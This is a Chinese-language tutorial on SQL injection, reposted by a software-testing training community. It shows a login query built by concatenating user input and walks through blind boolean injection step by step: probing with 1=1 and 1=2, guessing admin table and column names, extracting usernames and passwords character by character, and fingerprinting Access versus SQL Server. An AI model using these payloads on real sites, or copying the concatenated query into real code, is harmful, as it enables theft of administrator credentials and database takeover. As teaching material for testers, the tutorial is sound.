Web安全基礎之SQL注入式攻擊

所謂SQL注入式攻擊，就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字元串，欺騙伺服器執行惡意的SQL命令。在某些表單中，用戶輸入的內容直接用來構造（或者影響）動態SQL命令，或作為存儲過程的輸入參數，這類表單特別容易受到SQL注入式攻擊。常見的SQL注入式攻擊過程類如：

⑴ 某個ASP.NET Web應用有一個登錄頁面，這個登錄頁面控制著用戶是否有權訪問應用，它要求用戶輸入一個名稱和密碼。

⑵ 登錄頁面中輸入的內容將直接用來構造動態的SQL命令，或者直接用作存儲過程的參數。下面是ASP.NET應用構造查詢的一個例子：

System.Text.StringBuilder query = new System.Text.StringBuilder(

"SELECT * from Users WHERE login = "")

.Append(txtLogin.Text).Append("" AND password="")

.Append(txtPassword.Text).Append(""");

⑶ 攻擊者在用戶名字和密碼輸入框中輸入""或c"=c"之類的內容。

⑷ 用戶輸入的內容提交給伺服器之後，伺服器運行上面的ASP.NET代碼構造出查詢用戶的SQL命令，但由於攻擊者輸入的內容非常特殊，所以最後得到的 SQL命令變成：

SELECT * from Users WHERE login = "" or c" =c" AND password = "" or c"=c"。

⑸ 伺服器執行查詢或存儲過程，將用戶輸入的身份信息和伺服器中保存的身份信息進行對比。

⑹ 由於SQL命令實際上已被注入式攻擊修改，已經不能真正驗證用戶身份，所以系統會錯誤地授權給攻擊者。

如果用戶的帳戶具有管理員或其他比較高級的許可權，攻擊者就可能對資料庫的表執行各種他想要做的操作，包括添加、刪除或更新數據，甚至可能直接刪除表。

今天我們來說個很簡單的用新聞頁面的""&request 漏洞做的注入

在地址欄輸入：and 1=1

查看漏洞是否存在,如果存在就正常返回該頁,如果沒有,則顯示錯誤，繼續假設這個站的資料庫存在一個admin表在地址欄：

and 0(select count(*) from admin)

返回頁正常,假設成立了。

下面來猜猜看一下管理員表裡面有幾個管理員ID：

and 1

頁面什麼都沒有。管理員的數量等於或者小於1個

and 1=(select count(*) from admin)

輸入=1沒顯示錯誤，說明此站點只有一個管理員。

下面就是要繼續猜測admin 裡面關於管理員用戶名和密碼的欄位名稱。

and 1=(select count(*) from admin where len(username)>0)

猜解錯誤!不存在 username 這個欄位。只要一直改變括弧裡面的username這個欄位,下面給大家幾個常用的

user,users,member,members,userlist,memberlist,userinfo,admin,manager,用戶,yonghu

用戶名稱欄位猜解完成之後繼續猜解密碼欄位

and 1=(select count(*) from admin where len(password)>0)

password 欄位存在！因為密碼欄位一般都是這個拉,如果不是就試試pass如果還不是就自己想想吧

我們已經知道了管理員表裡面有3個欄位 id,user,password。

1、id 編號

2、user 用戶名

3、password 密碼

下面繼續的就是管理員用戶名和密碼的猜解了。一個一個來,有點麻煩,最好找個猜解機來先猜出長度!

and 1=(select count(*) from admin where len(user)

user 欄位長度小於10

and 1=(select count(*) from admin where len(user)

user 欄位長度不小於5

慢慢的來,最後猜出長度等於6,請看下面,返回正常就說明猜解正確

and 1=(select count(*) from admin where len(user)=6)

下面猜密碼

and 1=(select count(*) from admin where len(password)=10)

猜出來密碼10位,不要奇怪,現在網管都有防備的,所以密碼上20位也不太奇怪了

下面該做的就是把他們拆開來一個一個猜字母

and 1=(select count(*) from admin where left(user,1)=a)

返回正常，第一位字母等於a,千萬不要把大寫和小寫給搞錯了哦~~呵呵,如果不a就繼續猜其他的字元落,反正猜到返回正常就算OK了開始猜解帳號的第二位字元。

and 1=(select count(*) from admin where left(user,2)=ad)

就這樣一次加一個字元這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了

其實猜出了前幾個字母你就自己可以想像了，用到社會工程學了喲~，比如猜到了ad ，你就可以猜了administrator,or ,admin,or ,adminstra.......這樣猜的效率比較高喲!

工作還沒有完,別忙著跑了,還有10位密碼,呵呵

and 1=(select count(*) from admin where left(password,1)=a)

經過無數次錯誤之後（首先大家得有個準備SQL注入有時候就是很煩的）

htttp://host/news/article_view.asp?id=2499

and 1=(select count(*) from admin where left(password,10)=administra)

結果密碼是administra前面我們說可以通過一些返回信息來判斷ＳＱＬ注入，但首先不一定每台伺服器的IIS都返回具體錯誤提示給客戶端，如果程序中加了cint(參數)之類語句的話，ＳＱＬ注入是不會成功的，但伺服器同樣會報錯，具體提示信息為處理 URL 時伺服器上出錯。請和系統管理員聯絡。

其次，部分對ＳＱＬ注入有一點了解的程序員，認為只要把單引號過濾掉就安全了，這種情況不為少數，如果你用單引號測試，是測不到注入點的

那麼，什麼樣的測試方法才是比較準確呢？

答案如下：

① http://host/showdetail.asp?id=49

② http://host/showdetail.asp?id=49 ;;and 1=1

③ http://host/showdetail.asp?id=49 ;;and 1=2

這就是經典的1=1、1=2測試法了，怎麼判斷呢？看看上面三個網址返回的結果就知道了：

可以注入的表現：

① 正常顯示（這是必然的，不然就是程序有錯誤了

② 正常顯示，內容基本與①相同

③ 提示BOF或EOF（程序沒做任何判斷時）、或提示找不到記錄（判斷了rs.eof時）、或顯示內容為空（程序加了on error resume next）

不可以注入就比較容易判斷了，①同樣正常顯示，②和③一般都會有程序定義的錯誤提示，或提示類型轉換時出錯。

當然，這只是傳入參數是數字型的時候用的判斷方法，實際應用的時候會有字元型和搜索型參數，下面我們在來坐分析。

不過我們先來說一個問題：

不同的資料庫的函數、注入方法都是有差異的，所以在注入之前，我們還要判斷一下資料庫的類型。一般ASP最常搭配的資料庫是Access和SQLServer，網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼資料庫呢？來看看：SQLServer有一些系統變數，如果伺服器IIS提示沒關閉，並且SQLServer返回錯誤提示的話，那可以直接從出錯信息獲取，方法如下：

http://host/showdetail.asp?id=49 ;;and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個 nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變數user的值，這樣，不廢吹灰之力就拿到了資料庫的用戶名。在以後的篇幅里，大家會看到很多用這種方法的語句。

順便說幾句，眾所周知，SQLServer的用戶sa是個等同Adminstrators許可權的角色，拿到了sa許可權，幾乎肯定可以拿到主機的 Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將」dbo」轉換成int的列發生錯誤，而不是」sa」。

如果伺服器IIS不允許返回錯誤提示，那怎麼判斷資料庫類型呢？我們可以從Access和SQLServer和區別入手，Access和 SQLServer都有自己的系統表，比如存放資料庫中所有對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示「沒有許可權」，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確認可以注入的情況下，使用下面的語句：

http://host/showdetail.asp?id=49 ;;and (select count(*) from sysobjects)>0

http://host/showdetail.asp?id=49 ;;and (select count(*) from msysobjects)>0

如果資料庫是SQLServer，那麼第一個網址的頁面與原頁面http://host/showdetail.asp?id=49是大致相同的；而第二個網址，由於找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面完全不同。

如果資料庫用的是Access，那麼情況就有所不同，第一個網址的頁面與原頁面完全不同；第二個網址，則視乎資料庫設置是否允許讀該系統表，一般來說是不允許的，所以與原網址也是完全不同。大多數情況下，用第一個網址就可以得知系統所用的資料庫類型，第二個網址只作為開啟 IIS錯誤提示時的驗證。

本文包含內容僅供學習交流，版權歸原作者所有。

如對本文使用內容有異議，請及時聯繫我們刪除。

-END-

凡貓學院——集產品學習、測試學習、企業服務為一體的學員制社群。

創立於2016年，教授學員功能測試、自動化測試、產品經理的知識。 幫助在職測試工程師、產品經理進行職業進階。幫助學生、其他行業從業人員轉行互聯網。

現全國學員1078人，遍布在各規模的大中小公司。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！